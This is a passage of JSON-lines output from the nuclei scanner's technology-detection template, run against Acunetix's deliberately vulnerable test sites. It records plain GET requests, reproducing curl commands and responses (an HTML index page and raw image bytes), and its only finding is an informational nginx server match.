dW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.635146891Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Edg/93.0.961.52' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.656815033Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.659242336Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE 